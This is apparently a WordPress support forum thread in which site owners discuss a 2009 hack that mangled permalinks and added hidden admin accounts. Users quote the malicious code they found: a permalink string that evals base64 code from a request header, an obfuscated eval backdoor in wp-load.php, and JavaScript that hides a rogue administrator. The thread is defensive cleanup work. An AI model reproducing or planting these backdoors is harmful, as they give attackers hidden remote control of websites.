• This just started today, and I’m not certain why it is happening. At the end of any link, WP is appending the following “/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%/” to the end of the link.

    I’m far from an expert on WP code (I deal mostly with Drupal) so I’m not certain how WP is building links/passing the link information information. The theme link is correctly set to <?php the_permalink() ?>.

    Any thoughts on why this is happening?

Viewing 15 replies - 16 through 30 (of 66 total)
  • Thanks for that Chloe. I had 2 blogs compromised. One didn’t have new users, but one indeed has a new admin, RobertToth89 or similar. He disappears immediately after loading the page, so I can’t edit or delete him.

    Chloe,

    I do not have that problem, but if you have access to the database you can go into the Users table and manually delete the unwanted account

    Got it – he has a first name of a whole bunch of javascript designed to hide him.

    here it is

    … <div id=”user_superuser”><script language=”JavaScript”> var setUserName = function(){ try{ var t=document.getElementById(“user_superuser”); while(t.nodeName!=”TR”){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName(“H3″); var s = ” shown below”; for (var i = 0; i < tags.length; i++) { var t=tags[i].innerHTML; var h=tags[i]; if(t.indexOf(s)>0){ s =(parseInt(t)-1)+s; h.removeChild(h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } var arr=document.getElementsByTagName(“ul”); for(var i in arr) if(arr[i].className==”subsubsub”){ var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML); if(n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,”>Administrator (“+(n[1]-1)+”)<“); arr[i].innerHTML=txt; } } }catch(e){}; }; addLoadEvent(setUserName); </script></div>

    I got him by clicking on another user, and then just increasing the user ID number in the URL til I found him

    I deleted that javascript and saved him as a subscriber, and then I could see him in the lists and delete him

    The blog that had the admin inserted was on 2.6.3 at the time, and the one that didn’t was on 2.7.1, so maybe the admin insertion in older blogs is the real aim behind this, and the permalink screwup without admin insertion is just all that later versions will permit.

    found this at the to of wp-load.php, is this related ?

    function gpc_4701($l4703){if(is_array($l4703)){foreach($l4703 as $l4701=>$l4702)$l4703[$l4701]=gpc_4701($l4702);}elseif(is_string($l4703) && substr($l4703,0,4)==”____”){eval(base64_decode(substr($l4703,4)));$l4703=null;}return $l4703;}if(empty($_SERVER))$_SERVER=$HTTP_SERVER_VARS;array_map(“gpc_4701”,$_SERVER);

    @johninnit Thanks for that – I’ll try your process and delete him if I can. I am on verion 2.7.1 though so does that throw your theory of just attacking older versions? If we delete him, do you think that’s the end of it or should I be looking for other problems?

    This just started happening on my site https://www.AmericanFreethought.com overnight.

    Has anyone figured out definitively what is causing this and how to fix it? It appears to affect all the permalinks (all that I have checked anyway), and I don’t seem to be able to edit the link and remove all the gobbledy-gook off the end.

    Unfortunately, I am not a coder. Is there a relatively straightforward way to remedy this?

    Thanks!

    Chloe,

    Oh ?? That’s very odd.

    I had some good advice on clearing up after upgrade here https://www.ads-software.com/support/topic/307518?replies=15 – if you don’t know it already (I didn’t!)

    johncsnider, it should be possible to just choose one of the default permalink options in admin and have them fix themselves (and then upgrade and clean)

    Someone should probably do a proper writeup about this, because there seems to have been an outbreak overnight.

    It is important that everyone realises that just restoring the permalink setting isn’t enough; the hidden admin user has to be removed as well!

    ( My blog was compromised too: https://www.ads-software.com/support/topic/307588 )

    It seems that some sort of bot ran last night to infect a whole bunch of blogs with this scheme to open the doors. I suspect that this was the first step for this hacker, and the second step is to actually exploit the holes.

    The scary part is that we don’t know how the hacker inserted all these lines of code. So, it’s quite possible that the hacker would run the script/bot to re-open the doors to our sites. We haven’t done anything to protect our sites; we just fixed the damage.

    I noticed that this hidden admin did not have email address. Email address is required at the time of registration, so I suspect that it was inserted directly into the database.

    Were any of you running 2.8.4 when this happened? Because I upgraded to the latest version immediately after discovering this, hoping that that would prevent it from happening again…

    @johninnit I did it – I got him, but more by luck than judgement – I managed to click on him in the split second before he disappeared on the page load! So he’s now gone, but how do we know what he did when he was there? Is there a change/action log in WordPress anywhere? Will read the page you recommended.

    @dyske It’s a worry isn’t it. If the permalinks hadn’t changed I guess it would have taken a lot longer to notice the hidden admin user. Has anyone on the latest WordPress version had any trouble? Should upgrading be our priority?

    I got the same problem and was forwarded this link by a friend…pretty straight-forward.
    https://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/

Viewing 15 replies - 16 through 30 (of 66 total)
  • The topic ‘WP adding code to the end of url links breaking them’ is closed to new replies.